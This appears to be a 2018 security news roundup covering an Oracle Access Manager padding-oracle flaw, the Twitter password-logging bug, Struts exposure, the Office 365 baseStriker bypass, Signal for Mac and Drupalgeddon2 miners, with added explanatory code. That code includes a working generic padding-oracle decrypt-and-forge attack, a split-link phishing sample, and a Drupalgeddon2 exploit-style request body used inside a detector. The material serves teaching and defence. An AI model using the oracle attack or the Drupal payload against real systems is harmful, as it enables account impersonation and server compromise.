CVE-2018-2879 – Vulnerability in Oracle Access Manager can let attackers impersonate any user account
Security researcher Wolfgang Ettlinger of SEC Consult Vulnerability Lab has discovered a vulnerability in Oracle Access Manager (OAM) that a remote attacker can exploit to bypass authentication and take over the account of any user or administrator on affected systems. Oracle Access Management provides web SSO with MFA, coarse-grained authorization and session management, and standard SAML federation and OAuth capabilities to enable secure access to mobile applications and external cloud services. “The Oracle Access Manager is the component of the Oracle Fusion Middleware that handles authentication for all sorts of web applications,” Ettlinger explained.

The flaw, tracked as CVE-2018-2879, stems from a flawed cryptographic format used by OAM. Ettlinger explained that an attacker can abuse the way OAM handles encrypted messages to trick the software into disclosing information that can then be used to log in as other users: once the attacker can run a padding oracle attack to disclose an account’s authorization cookie, he can write a script that generates valid login keys for any desired user, including administrators. “By exploiting this vulnerability we were able to fabricate arbitrary authentication tokens, allowing us to impersonate any user and effectively break the main functionality of OAM,” the researchers wrote. “What’s more, the session cookie crafting process lets us create a session cookie for an arbitrary username, thus allowing us to impersonate any user known to the OAM.” A video PoC shows an attacker impersonating arbitrary users by triggering the flaw. Oracle Access Management 11g and 12c are both affected by the vulnerability.
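The padding oracle attack referred to above, as an added example that is not SEC Consult’s proof of concept and does not reproduce OAM’s actual cookie format. It assumes the generic setting such attacks rely on: a CBC-mode token with PKCS#7 padding and a server that answers differently for bad padding than for good. A toy Feistel cipher stands in for the real block cipher (the attack never touches the cipher internals, only the oracle), and the key and cookie contents are constructed here. It first discloses a cookie’s plaintext with the oracle alone, then uses the same oracle backwards (the CBC-R technique) to forge a token for a chosen user, which is the step that turns disclosure into impersonation.

```python
"""Added example (not SEC Consult's or Oracle's code): a generic CBC padding-oracle
attack. A toy Feistel cipher stands in for the real block cipher; key and token
contents are constructed, and only padding_oracle()'s verdict is attacker-visible."""
import hashlib
import os

BLOCK = 16
SECRET_KEY = os.urandom(16)  # constructed server key, never available to the attacker

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, block):
    """Toy 4-round Feistel network on 16-byte blocks (stand-in for AES)."""
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round(key, right, rnd))
    return left + right

def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round(key, left, rnd)), left
    return left + right

def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def _split(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def cbc_encrypt(key, plaintext):
    """Server side: IV || CBC-encrypted, PKCS#7-padded blocks."""
    out = [os.urandom(BLOCK)]
    for chunk in _split(pad(plaintext)):
        out.append(block_encrypt(key, _xor(chunk, out[-1])))
    return b"".join(out)

def _cbc_unchain(block_fn, data):
    """CBC decryption given any way of computing D(C) for a single block."""
    blocks = _split(data)
    return unpad(b"".join(_xor(block_fn(c), p) for p, c in zip(blocks, blocks[1:])))

def cbc_decrypt(key, data):
    return _cbc_unchain(lambda c: block_decrypt(key, c), data)

def padding_oracle(token):
    """All the attacker observes: did the server accept the padding?"""
    try:
        cbc_decrypt(SECRET_KEY, token)
        return True
    except ValueError:
        return False

def recover_intermediate(oracle, target):
    """Recover block_decrypt(key, target) byte by byte, using only the oracle."""
    inter = bytearray(BLOCK)
    for k in range(1, BLOCK + 1):                  # forge padding of length k
        for guess in range(256):
            prev = bytearray(BLOCK)
            prev[-k] = guess
            for j in range(1, k):                  # known bytes must decrypt to k
                prev[-j] = inter[-j] ^ k
            if not oracle(bytes(prev) + target):
                continue
            if k == 1:                             # rule out a chance ..02 02 match
                prev[-2] ^= 0xFF
                if not oracle(bytes(prev) + target):
                    continue
            inter[-k] = guess ^ k
            break
        else:
            raise RuntimeError("oracle accepted nothing; not a padding oracle?")
    return bytes(inter)

def decrypt_with_oracle(oracle, token):
    """Disclose a token's plaintext (e.g. an authorization cookie) without the key."""
    return _cbc_unchain(lambda c: recover_intermediate(oracle, c), token)

def forge_with_oracle(oracle, plaintext):
    """CBC-R: build a valid token for chosen plaintext, working from the last block back."""
    cur = os.urandom(BLOCK)                        # the final ciphertext block is free
    out = [cur]
    for chunk in reversed(_split(pad(plaintext))):
        cur = _xor(recover_intermediate(oracle, cur), chunk)   # previous block (or IV)
        out.append(cur)
    return b"".join(reversed(out))
```

Each recovered byte costs at most 256 oracle queries, so a two-block cookie is disclosed or forged in a few thousand requests; against a real server the oracle is a network round trip and the padding verdict may have to be inferred from an error page or a timing difference rather than a clean boolean.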
Australia’s Commonwealth Bank lost 20 Million customer records
According to Commonwealth Bank representatives, two magnetic data tapes were lost; both stored customer records, including names, addresses, account numbers and transaction details from 2000 to 2016. According to the broadcaster ABC, the data was supposed to have been destroyed by a sub-contractor after it dismantled a data centre, but the sub-contractor never provided the bank with documentation confirming the destruction of the tapes. The bank nevertheless tried to downplay the situation, confirming that the records did not include passwords, PINs or other financial or sensitive information. An independent forensic investigation conducted in 2016 concluded that “the most likely scenario was the tapes had been disposed of”; it was not a data breach, and the banking systems were not compromised by attackers. The Commonwealth Bank is continuing to monitor the accounts of the affected customers and is providing them full coverage against fraud and other fraudulent activity.

“We take the protection of customer data very seriously and incidents like this are not acceptable,” announced Angus Sullivan, acting group executive for the lender’s retail banking services. “We also put in place heightened monitoring of customer accounts to ensure no data compromise had occurred.”

“Maintaining data security is of vital importance for everybody, whether it’s the private sector or governments and if there is a serious data breach or loss, the people affected should be advised so they can take steps to protect themselves,” he said.

“We concluded, given the results of the investigation, that we would not alert customers. The relevant regulators were notified in 2016 and we undertook a thorough forensic investigation, providing further updates to our regulators after its completion,” said Sullivan.
Twitter urges its 330 million users to change passwords after bug exposed them in plain text
Twitter is urging its users to change their passwords immediately after a bug caused some of them to be stored in plain text. “We recently identified a bug that stored passwords unmasked in an internal log. We have fixed the bug, and our investigation shows no indication of breach or misuse by anyone,” reads the security advisory published by the company. Twitter discovered the flaw a few weeks ago and has already reported the issue to some regulators. The bug caused passwords to be written in plain text to an internal log before the hashing process was completed: “Due to a bug, passwords were written to an internal log before completing the hashing process. We found this error ourselves, removed the passwords, and are implementing plans to prevent this bug from happening again,” continues the advisory.

The company did not reveal the number of affected accounts, but according to Reuters a person familiar with the company’s response said the number was “substantial,” and the passwords may have been exposed for “several months.” The warning goes out to all of Twitter’s more than 330 million users; according to the company, the plain-text passwords were stored only on an internal system. Twitter says it has fixed the glitch and started an internal investigation to verify whether the data may have been abused by insiders. “Out of an abundance of caution, we ask that you consider changing your password on all services where you’ve used this password,” the advisory adds.

Twitter apologized to its users and asked them to change their passwords and enable two-factor authentication. Of course, change the password on every other site where you reused the same Twitter credentials as well. Just after the announcement of the incident, Twitter’s share price dropped 1 percent in extended trading to $30.35, after gaining 0.4 percent during the session.

This is the latest disclosure of a security incident in the weeks before the EU General Data Protection Regulation takes effect; a couple of days ago, GitHub announced that it had suffered a similar incident.
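The bug class Twitter describes, a request logged before the password is hashed, as an added example that is not Twitter’s code and says nothing about how Twitter’s logging actually works. The request dict and the in-memory log sink are constructed; the KDF parameters are illustrative. The vulnerable handler and the hardened one sit side by side, and a small audit helper checks whether a raw secret ever reached the log, which is the check Twitter had to run over its own logs.

```python
"""Added example (not Twitter's code): a password logged before hashing, next to a
hardened handler that hashes first and logs only a redacted view of the request.
The request dict and log sink are constructed; the KDF parameters are illustrative."""
import hashlib
import hmac
import os
import re

SECRET_FIELD = re.compile(r"pass(word)?|pwd|secret|token|cookie|session", re.I)
SALT_LEN, ITERATIONS = 16, 200_000

def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256; the stored form is salt || digest."""
    salt = salt or os.urandom(SALT_LEN)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

def verify_password(password, stored):
    salt, digest = stored[:SALT_LEN], stored[SALT_LEN:]
    return hmac.compare_digest(hash_password(password, salt)[SALT_LEN:], digest)

def redact(params):
    """Mask fields by *name*; secret values cannot be recognised reliably by content."""
    return {k: "[REDACTED]" if SECRET_FIELD.search(k) else v for k, v in params.items()}

def login_vulnerable(params, log):
    """The bug class: the raw request hits the log before hashing completes."""
    log.append(f"login request: {params}")            # the password now sits in the log
    return hash_password(params["password"])

def login_hardened(params, log):
    """Hash first, then log only a redacted view of the request."""
    stored = hash_password(params["password"])
    log.append(f"login request: {redact(params)}")
    return stored

def log_leaks(log, secret):
    """Audit helper: does any log line contain the raw secret?"""
    return any(secret in line for line in log)
```

Redacting by field name is the practical choice because a password value is indistinguishable from any other string; the residual risk is a new field name the pattern does not cover, which is why the audit helper (or a secret scanner over the log store) belongs in the pipeline as well.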
Phishing campaign aimed at Airbnb users leverages GDPR as a bait
Airbnb, like many other companies, is emailing its users to inform them of changes to its privacy policy ahead of the upcoming GDPR, and cybercriminals are riding along: experts from Redscan are monitoring a spam campaign that targets Airbnb users with messages referencing the GDPR and its threat of severe penalties in order to demand personal information and financial data. The phishing emails use a simple but effective social engineering trick: the message informs hosts that they cannot accept new bookings or contact potential guests until they accept the GDPR-related update. “This update is mandatory because of the new changes in the EU Digital privacy legislation that acts upon United States-based companies, like Airbnb in order to protect European citizens and companies,” reads the spam message, according to Redscan. If victims click the malicious link embedded in the email, they are redirected to a phishing page designed to harvest both personal and financial information. According to Redscan, the malicious emails come from a sender domain crafted to look legitimate rather than the genuine @airbnb address.

“Modern phishing campaigns are becoming increasingly difficult to spot and people need to be extra vigilant when opening emails and clicking links since it’s important to ensure they originate from a trusted source,” Sky News quoted Redscan Director of Cybersecurity Mark Nicholls as saying. “The irony won’t be lost on anyone that cybercriminals are exploiting the arrival of new data protection regulations to steal people’s data.”
The Pentagon bans Huawei and ZTE phones from stores on military bases
The Pentagon considers the security risk posed by devices manufactured by the Chinese firms Huawei and ZTE unacceptable; US officials believe the smartphones could be used to spy on military personnel. “Given security concerns about ZTE cell phones and related products, the (Pentagon’s) exchange services also removed ZTE products from their stores,” said Pentagon spokesman Eastburn, who confirmed that the decision to ban Huawei phones and related products was taken on April 25. ZTE did not immediately comment on the ban, while Huawei promptly replied by highlighting the quality of its products and their reliability in terms of security.

The move follows a series of similar steps. In February, Dan Coats, the Director of National Intelligence, along with several other top intelligence officials, advised Americans to avoid buying Huawei and ZTE products. “Chinese cyber espionage and cyber attack capabilities will continue to support China’s national security and economic priorities,” Coats told the Senate Intelligence Committee. The Federal Communications Commission has also moved to bar federal funds from being spent on wireless equipment made by companies that pose a security risk to US infrastructure, and the Department of Commerce’s Bureau of Industry and Security (BIS) announced that ZTE has been banned from purchasing goods from US companies. In April, the UK’s GCHQ intelligence agency warned British telecoms firms of the risks of using ZTE equipment and services in their infrastructure; the alert, issued by its National Cyber Security Centre, said the Chinese firm “would present a risk to UK national security that could not be mitigated effectively or practicably”.
Over 10,000 companies downloading software vulnerable to Equifax hack
Even after the massive data breach that allowed hackers to steal the personal information of 148 million Equifax customers, thousands of companies are still using the software that made the breach possible. According to Fortune, Maryland-based cybersecurity firm Sonatype identified as many as 10,801 organizations that have downloaded an old version of Apache Struts, the same free, open-source software that hackers exploited to swipe names, social security numbers, birthdays, addresses and other identifiers from Equifax’s databases. Of the organizations that downloaded the vulnerable version of the software, seven were Fortune Global 100 tech companies, eight were Fortune Global 100 automakers, and 15 were Fortune Global 100 financial services or insurance firms, according to Fortune; ZDNet reports that over half of the Fortune Global 100 companies are using the vulnerable version. Apache Struts is a framework for building web applications and is commonly used in online payment systems; the Apache Software Foundation has released seven patched versions since March 2017. The Equifax breach led to probes by members of Congress and the resignation of former chief executive Richard Smith, and the company was accused of not updating its computer systems and of withholding information about the extent of the breach.
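The check a practitioner actually wants here is whether their own build still pins an affected Struts release. Below is an added example, not Sonatype’s, Fortune’s or Apache’s code, that audits a Maven pom.xml for Struts 2 artifacts inside the ranges affected by CVE-2017-5638 (the Jakarta Multipart parser bug exploited at Equifax; the ranges come from the Apache S2-045 advisory). The pom is constructed; version numbers declared through a `${property}` are resolved from the pom’s own properties block.

```python
"""Added example (not Sonatype's, Fortune's or Apache's code): audit a Maven pom.xml
for Struts 2 artifacts still inside the version ranges hit by CVE-2017-5638, the
Jakarta Multipart parser bug behind the Equifax breach. The pom below is constructed."""
import re
import xml.etree.ElementTree as ET

NS = {"m": "http://maven.apache.org/POM/4.0.0"}

SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <properties><struts.version>2.3.31</struts.version></properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.struts</groupId>
      <artifactId>struts2-core</artifactId>
      <version>${struts.version}</version>
    </dependency>
    <dependency>
      <groupId>org.apache.struts</groupId>
      <artifactId>struts2-convention-plugin</artifactId>
      <version>2.5.10.1</version>
    </dependency>
    <dependency>
      <groupId>org.slf4j</groupId><artifactId>slf4j-api</artifactId><version>1.7.25</version>
    </dependency>
  </dependencies>
</project>"""

def parse_version(text):
    """'2.5.10.1' -> (2, 5, 10, 1); a '-SNAPSHOT' style suffix is ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", text.split("-")[0]))

def is_vulnerable(version):
    """Affected ranges per the Apache S2-045 advisory: 2.3.5-2.3.31 and 2.5-2.5.10."""
    v = parse_version(version)
    return (2, 3, 5) <= v < (2, 3, 32) or (2, 5) <= v < (2, 5, 10, 1)

def struts_dependencies(pom_xml):
    """Yield (artifactId, resolved version) for every org.apache.struts dependency."""
    root = ET.fromstring(pom_xml)
    props_el = root.find("m:properties", NS)
    props = {} if props_el is None else {p.tag.rsplit("}", 1)[-1]: p.text or "" for p in props_el}
    for dep in root.iterfind(".//m:dependency", NS):
        if dep.findtext("m:groupId", "", NS) != "org.apache.struts":
            continue
        version = dep.findtext("m:version", "", NS)
        version = re.sub(r"\$\{([^}]+)\}", lambda m: props.get(m.group(1), m.group(0)), version)
        if version:
            yield dep.findtext("m:artifactId", "", NS), version

def audit_pom(pom_xml):
    """[(artifactId, version, vulnerable?)] for the Struts artifacts in a pom."""
    return [(a, v, is_vulnerable(v)) for a, v in struts_dependencies(pom_xml)]
```

Sonatype’s figure counts downloads from the repository, which says nothing about what is deployed; a check like this over the build files (and, better, over the resolved dependency tree, since Struts can arrive transitively or through a parent pom this script does not follow) tells you whether your own applications are exposed.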
Hackers Found Using A New Way to Bypass Microsoft Office 365 Safe Links
Security researchers have revealed a technique, found in use in the wild by some hacking groups, that bypasses a security feature of Microsoft Office 365 designed to protect users from malware and phishing attacks. Dubbed Safe Links, the feature is part of Microsoft’s Advanced Threat Protection (ATP) offering for Office 365 and works by replacing every URL in an incoming email with a Microsoft-owned URL. Each time a user clicks a link in an email, they are first sent to a Microsoft-owned domain, where the company checks the original URL for anything suspicious: if its scanners detect a malicious element, the user is warned; if not, the user is redirected to the original link.

However, researchers at cloud security company Avanan have revealed how attackers have been bypassing Safe Links using a technique they call the “baseStriker attack.” The attack relies on the <base> tag in the header of an HTML email, which defines a default base URI (URL) for relative links in a document or web page: if a base URL is defined, all subsequent relative links are resolved against it. The researchers compared the HTML of a traditional phishing email with one that uses a <base> tag to split up the malicious link in such a way that Safe Links fails to identify and replace the partial hyperlink, while the mail client still resolves it and sends the victim to the phishing site when clicked. The researchers tested the baseStriker attack against several configurations and found that “anyone using Office 365 in any configuration is vulnerable,” whether the web client, the mobile app or the Outlook desktop application. So far, researchers have only seen the baseStriker attack used to send phishing emails, but they believe it could also be leveraged to distribute ransomware, malware and other malicious software.
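The split-link trick, as an added example that is not Avanan’s or Microsoft’s code and makes no claim about how Safe Links is implemented internally. Two HTML mails are constructed: a conventional phishing mail with an absolute link and a baseStriker-style mail that puts the host in <base> and only a relative path in the anchor. A naive link extractor that treats only absolute hrefs as URLs (the behaviour being bypassed) is shown beside one that resolves every href against <base> the way a mail client will, and a helper lists the links the naive scanner would never have rewritten. The phish.example domain is a placeholder.

```python
"""Added example (not Avanan's or Microsoft's code): two constructed HTML mails,
one conventional and one baseStriker-style, run through a naive link extractor
that only sees absolute hrefs and through one that resolves hrefs against <base>
the way a mail client does."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed samples; phish.example is a placeholder domain.
CLASSIC_PHISH = ('<html><body><a href="http://phish.example/login">'
                 'Verify your account</a></body></html>')
BASESTRIKER_PHISH = ('<html><head><base href="http://phish.example/"></head>'
                     '<body><a href="login">Verify your account</a></body></html>')

class LinkCollector(HTMLParser):
    """Collect the first <base href> and every <a href> in document order."""

    def __init__(self):
        super().__init__()
        self.base = None
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "base" and attrs.get("href") and self.base is None:
            self.base = attrs["href"]        # clients honour only the first <base>
        elif tag == "a" and attrs.get("href"):
            self.hrefs.append(attrs["href"])

def _collect(html):
    parser = LinkCollector()
    parser.feed(html)
    return parser

def extract_links_naive(html):
    """Mirrors the bypassed behaviour: a relative href is not treated as a URL."""
    return [h for h in _collect(html).hrefs if urlparse(h).scheme in ("http", "https")]

def extract_links_base_aware(html):
    """Resolve every href against <base>, so split links reassemble before scanning."""
    parser = _collect(html)
    return [urljoin(parser.base or "", h) for h in parser.hrefs]

def missed_by_naive_scanner(html):
    """Links a client will follow that the naive scanner never saw, let alone rewrote."""
    return [u for u in extract_links_base_aware(html) if u not in extract_links_naive(html)]
```

A rewriter built on the base-aware extractor would wrap the reassembled absolute URL rather than the bare relative path; the simpler mitigation on the gateway side is to strip or neutralise <base> in inbound HTML mail, since legitimate email has little use for it.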
Self-destructing messages received on ‘Signal for Mac’ can be recovered later
It turns out that the macOS client for the popular end-to-end encrypted messaging app Signal fails to properly delete disappearing (self-destructing) messages from the recipient’s system, leaving the content of sensitive messages at risk of exposure. For those unaware, disappearing messages in Signal self-destruct after a duration set by the sender, leaving no trace on the receiver’s device or on Signal’s servers. However, security researcher Alec Muffett noticed that messages that are supposed to “disappear” can still be seen even after they have been deleted from the app. Another security researcher, Patrick Wardle, reproduced the issue and explained that macOS keeps a copy (partial, for long messages) of disappearing messages in a user-readable database belonging to macOS’s Notification Center, from where they can be recovered at any later time. macOS desktop notifications (the banners and alerts that appear in the upper-right corner of the screen) are a convenient way to keep an eye on incoming messages without checking an inbox obsessively, and according to a blog post published by Wardle, if notifications are enabled for the Signal app, it shows notifications for disappearing messages as well, in the form of truncated messages (generally 1–1.5 lines of the full message). Sharing incoming disappearing messages with the notification system leads to two privacy issues. First, “disappearing” messages may remain in the macOS Notification Center UI even after being deleted within the Signal app, and can be seen in the notification bar until the user manually closes them. Second, in the back end, the Notification Center’s SQLite database also keeps a copy of the truncated messages, which can be read with normal user permissions, for example by a malicious app installed on the system.

Wardle suggests that Signal should either not send notifications for disappearing messages at all, or explicitly delete such notifications from the system database when it removes the messages from its own UI. Meanwhile, to keep a malicious app, an attacker or anyone else with access to the machine from recovering the content of sensitive messages, consider disabling notifications for Signal until the issue is patched.
Hackers continue to hack Drupal installs to install backdoors and inject cryptocurrency malware
A week after the release of the security update for the CVE-2018-7600 flaw (Drupalgeddon2), a proof-of-concept (PoC) exploit was publicly disclosed, and hackers started using exploits for the two Drupal vulnerabilities to compromise Drupal installs, mostly for cryptocurrency mining. It has been estimated that potentially over one million Drupal websites are vulnerable to attacks exploiting the two flaws if the security patches are not installed. Experts at security firm Check Point, together with Drupal experts at Dofinity, analyzed the CMS to dissect the Drupalgeddon2 vulnerability and published a technical report on the flaw.

Now a growing number of malware campaigns is targeting Drupal installs. One of them was recently discovered by security researcher Troy Mursch, who found several compromised sites: “While these two sites have no relation to each other, they shared a common denominator — they both are using an outdated and vulnerable version of the Drupal content management system.” Security researchers from Imperva also found a malware campaign targeting Drupal websites, tracked as the “Kitty” campaign. “During the inspection of the attacks blocked by our systems, we came across the “Kitty” malware, an advanced Monero cryptocurrency miner, utilizing a “webminerpool”, an open source mining software for browsers.” The attackers used an in-browser cryptocurrency miner inside a file named “me0w.” According to Imperva, the Monero address used in the Kitty campaign is the same one used in other attacks on servers running vBulletin 4. No doubt the attackers will continue to attempt to exploit both Drupal flaws in the coming weeks, so it is essential to apply the necessary updates.
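Patching is the fix, but defenders also want to know whether the exploit was tried against them before the patch went on. Below is an added example, not Check Point’s, Imperva’s or Drupal’s code, that flags Drupalgeddon2-style requests. CVE-2018-7600 works by smuggling Form API render-array properties (keys beginning with “#”, such as mail[#post_render][]) through user-supplied input; in URLs the “#” normally arrives as %23. The access-log lines and the POST body are constructed (documentation IP ranges), and the third log line is a legitimate Drupal AJAX form request that must not be flagged.

```python
"""Added example (not Check Point's, Imperva's or Drupal's code): flag
Drupalgeddon2-style requests in constructed access-log and request-body samples.
CVE-2018-7600 abuses Drupal's Form API by smuggling render-array properties
(keys starting with '#', such as mail[#post_render][]) through user input;
in URLs the '#' is normally encoded as %23."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

RENDER_PROPERTY = re.compile(r"[\[/]#[a-z_]+", re.I)
LOG_REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Constructed log lines: one exploit attempt, one ordinary page view,
# one legitimate Drupal AJAX form request that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Apr/2018:10:12:01 +0000] "POST /user/register'
    '?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 512',
    '198.51.100.7 - - [30/Apr/2018:10:12:05 +0000] "GET /node/12 HTTP/1.1" 200 8192',
    '198.51.100.9 - - [30/Apr/2018:10:12:09 +0000] "POST /user/register'
    '?ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 640',
]
# Constructed POST body as a WAF or reverse proxy with body logging would record it.
SAMPLE_BODY = ("form_id=user_register_form&_drupal_ajax=1&mail[%23post_render][]=exec"
               "&mail[%23type]=markup&mail[%23markup]=id")

def has_render_property(query):
    """True if any key or value smuggles a '#'-prefixed Form API property."""
    for key, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch %2523-style double encoding
        if RENDER_PROPERTY.search(unquote(key) + " " + unquote(value)):
            return True
    return False

def scan_access_log(lines):
    """Return (ip, target) for requests whose query string carries the signature."""
    hits = []
    for line in lines:
        m = LOG_REQUEST.match(line)
        if m and has_render_property(urlsplit(m["target"]).query):
            hits.append((m["ip"], m["target"]))
    return hits
```

Standard access logs record only the query string, so the body-borne variant (the `mail[#post_render][]` form) is only visible where a WAF or proxy logs request bodies; run `has_render_property` over those, and treat a hit on an unpatched host as a compromise to investigate, not merely an attempt, since the PoC executes with a single request.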